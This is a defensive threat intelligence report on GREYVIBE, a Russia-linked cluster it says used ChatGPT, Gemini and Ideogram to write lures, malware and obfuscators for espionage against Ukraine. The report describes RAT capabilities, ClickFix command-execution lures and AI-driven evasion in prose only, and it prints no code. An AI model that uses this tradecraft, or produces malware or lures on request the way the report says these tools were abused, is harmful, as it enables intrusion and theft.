Executive Summary

GREYVIBE is a newly identified Russia-linked threat cluster conducting persistent, AI-enabled espionage operations against Ukrainian military, government, civilian, and business targets since at least August 2025. The group operates in the grey zone between financially motivated cybercrime and state-aligned intelligence work, systematically weaponizing commercial AI platforms to design lures, generate malware, build infrastructure, and script post-compromise activity.

GREYVIBE runs at least five parallel attack chains (PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo) that all ultimately deliver custom remote access tools PhantomRelay, LegionRelay, and the FallSpy Android spyware into high-value Ukrainian environments. Despite heavy AI use, the cluster exhibits repeated operational security mistakes that have exposed its tooling and tradecraft, including a design flaw in the LegionRelay/DroneLink infrastructure that gave defenders direct insight into backend activity.

1   Who Is GREYVIBE?

Identity, Alignment, and "Vibe Coding"

GREYVIBE is assessed as a Russian-speaking, Russia-nexus threat group whose activity aligns closely with Kremlin intelligence priorities but does not currently meet strict criteria for a formal state advanced persistent threat designation. Researchers link the group to Russian time zones, Russian-language admin panels and code comments, and victimology that tracks directly with Russian strategic interest in Ukrainian military and government assets.

The cluster name reflects both its operating position in the grey space between cybercrime and state activity and its disciplined approach to "vibe coding" operations: lures, infrastructure, and malware are consistently dressed in believable themes that match the emotional and contextual character of each target set, from government email to adult entertainment to drone charities. Rather than one monolithic campaign, GREYVIBE codes each operation's look, feel, and user experience to the environment it is impersonating, then uses AI to scale that aesthetic and narrative across emails, websites, chat personas, and voice or video deepfakes.

Attribution assessments from multiple vendors converge on the view that GREYVIBE is best understood as a Kremlin-aligned cybercrime crew or contractor that monetizes some access through crypto-mining while simultaneously conducting targeted intelligence collection. The presence of XMRig miners on selected victims, along with operational overlaps with TrickBot and UAC-0098 infrastructure and tooling, point to heritage in the broader Russian cybercrime ecosystem rather than a cleanly separated state unit.

Victimology

Victimology is centered on Ukraine and Ukraine-related organizations, with confirmed targeting of military personnel, government agencies, critical infrastructure, and private-sector firms, as well as Ukrainian diaspora and humanitarian ecosystems. Notably, PrincessClub-linked lures have pulled in active-duty Ukrainian combatants, and Nebo operations appear tailored to trick Ukrainian users into interacting with interfaces masquerading as Russian military communications portals.

2   How GREYVIBE Weaponizes AI

AI Across the Entire Attack Lifecycle

A defining characteristic of GREYVIBE is its systematic use of commercial generative AI platforms such as ChatGPT, Google Gemini, and Ideogram AI across nearly every phase of its operations. Metadata and development artifacts associated with the PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo campaigns show that AI tools were used to draft spear-phishing content, generate website copy, create imagery, write and refactor malware, and even assist with backend infrastructure scripting.

In lure development, GREYVIBE operators rely on LLMs to produce native-sounding, institutionally plausible Ukrainian and Russian-language emails, web content, and chat messages tailored to government, military, and civilian audiences. Ideogram and similar image tools are used to generate convincing logos, interface components, and site layouts that match both Ukrainian government branding and commercial adult or charity aesthetics, without reusing stolen assets that could raise suspicion.

On the technical side, AI support is evident in GREYVIBE's four custom obfuscators: LOOKVALPS and DAYLIGHT for PowerShell payloads, and LOOKVALJS and TEASOUP for JavaScript. Code patterns, comment styles, and transformation logic in these obfuscators resemble AI-generated script behaviors, including non-idiomatic variable naming and redundant logic structures that are typical of LLM-assisted code. This use of AI helps the group generate polymorphic variants that drift away from known signature patterns and static YARA rules, complicating conventional detection pipelines.

Advantages and Exposed Weaknesses

GREYVIBE's heavy AI dependency gives it three major advantages: it bridges skill gaps for less experienced operators, accelerates development cycles, and enables faster mutation of lures and code to evade behavioral and signature-based detections. Lower-skilled crew members can stand up multiple parallel campaigns using AI-assisted code and content, which in turn allows the group to sustain five distinct attack chains with relatively modest human resources.

This pattern aligns with broader industry observations that as threat actors lean on generative AI to generate or refactor code, they often skip deep testing and threat modeling, leaving latent bugs, misconfigurations, or information leaks that defenders can later weaponize.

3   Campaign Overview and Tradecraft

GREYVIBE does not rely on a single vector. Instead, it orchestrates multiple concurrent delivery chains that all converge on shared malware infrastructure.

Campaign Matrix

Across these campaigns, PhantomRelay and LegionRelay function as the primary post-compromise PowerShell RATs, offering capabilities including system fingerprinting, browser credential theft, dynamic script loading, screenshot capture, data exfiltration, and RDP setup. FallSpy, an Android-focused spyware, is deployed in PrincessClub and Nebo to harvest contacts, call logs, GPS location, SIM data, media files, and device identifiers from mobile devices associated with priority targets.

GREYVIBE's multi-vector delivery strategy mirrors a marketing funnel: email, web, mobile, and chat all serve as entry points feeding into a unified malware and C2 infrastructure designed to scale collections across diverse target sets.

4   AI in the Broader Cybercrime Ecosystem

GREYVIBE is part of a wider trend in which both state-aligned and criminal actors use AI across all stages of the attack lifecycle, from reconnaissance to monetization. Over the past two years, security vendors and cloud providers have documented threat actors using commercial and underground large language models to generate phishing content, translate and localize lures, write or obfuscate malware, and automate post-exploitation tasks such as data triage and crypto-asset movement.

Deepfake voice and video tools have already been abused to impersonate executives and trusted contacts for high-value social engineering, causing multi-million-dollar fraud losses in corporate environments. Similarly, AI can rapidly re-skin existing malware families to evade static detection, while automated scraping and analysis of open-source data allows actors to profile targets at a speed and scale far beyond manual OSINT.

GREYVIBE illustrates how even mid-tier operators can use off-the-shelf AI services to manage a portfolio of campaigns that would previously have required significantly more developer capacity. As more groups imitate this model, defenders should expect an increase in campaign volume, personalization, and code churn, coupled with a decline in easily recognizable stylistic fingerprints that historically underpinned attribution and clustering.

5   30/60/90-Day Outlook for AI-Enabled Threats

6   Implications and Recommendations

Why GREYVIBE Matters Beyond Ukraine

While GREYVIBE currently focuses on Ukraine and Ukraine-related entities, its tactics, tooling, and AI playbook are highly portable to other theaters and target sets. Russian-aligned cybercrime groups have a pattern of first honing capabilities against Ukrainian targets, then repurposing them against broader Western adversaries, as seen in historical TrickBot and UAC-0098 activity.

At the same time, GREYVIBE demonstrates that AI-augmented operations are not automatically high-sophistication: the group has made significant operational security mistakes, tested samples in public sandboxes, and occasionally monetized access with noisy tools such as crypto miners.

Priority Defensive Actions

1. 1

   Integrate GREYVIBE IOCs and Behavior into Detection

   • Ingest and maintain up-to-date indicators of compromise for GREYVIBE campaigns, including domains, IPs, file hashes, and obfuscator signatures for PhantomRelay, LegionRelay, FallSpy, LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP.
   • Augment with behavior-based analytics that flag unusual PowerShell command sequences, dynamic script loading, and suspicious web-to-PowerShell execution flows typical of PhantomMail and PhantomClick chains.
2. 2

   Harden Email and Web Controls Against Cloud-Delivered Archives and CAPTCHA-Style Lures

   • Review secure email gateway and cloud security posture management rules for handling archives delivered via Google Drive, 4sync, and similar services, ensuring detonation and content inspection of ZIP/RAR files even when hosted on trusted platforms.
   • Deploy user and content controls that highlight or interdict "Click to verify you are not a bot" or Cloudflare-mimicking prompts that request command execution, with tailored user education on ClickFix-style pages.
3. 3

   Treat AI-Assisted Threats as a Distinct Intelligence Category

   • Establish tagging in threat intelligence platforms for AI-assisted campaigns, capturing AI tool usage, code artifacts, and characteristic AI-generated patterns as first-class observables.
   • Coordinate with detection engineering to look for AI-authored code anomalies such as repetitive or unnecessary logic, inconsistent naming conventions, and patterns matching known LLM-generated samples.
4. 4

   Expand Phishing and Social-Engineering Training to Cover AI-Enabled Scenarios

   • Update awareness content to explicitly address AI-generated deepfakes, ultra-polished multilingual emails, fake charity and adult content sites, and CAPTCHA or verification flows that demand command execution.
   • For high-risk roles such as military, government, and critical infrastructure operators, include specific scenarios modeled on PrincessClub and DroneLink that show how personal communications and patriotic themes can be leveraged for targeting.
5. 5

   Monitor for Unusual Post-Compromise Scripting and Infrastructure Patterns

   • Instrument logging to capture detailed PowerShell and scripting telemetry, integrating detections for AI-style batch command structures and generic code comments indicative of LLM involvement.
   • Hunt for backend misconfigurations similar to those exposed in LegionRelay, including unauthenticated or weakly protected endpoints, verbose error messages, and debug interfaces left accessible on attacker infrastructure.
6. 6

   Prepare Response Playbooks That Assume AI-Accelerated Campaigns

   • Assume an attacker can regenerate lures and malware in hours, not weeks, and design containment and communication plans accordingly, focusing on closing behavioral gaps rather than chasing one-off indicators.
   • Include guidance for quickly assessing whether AI-assisted operational errors might expose attacker infrastructure or tooling, turning GREYVIBE-style mistakes into repeatable defender advantages.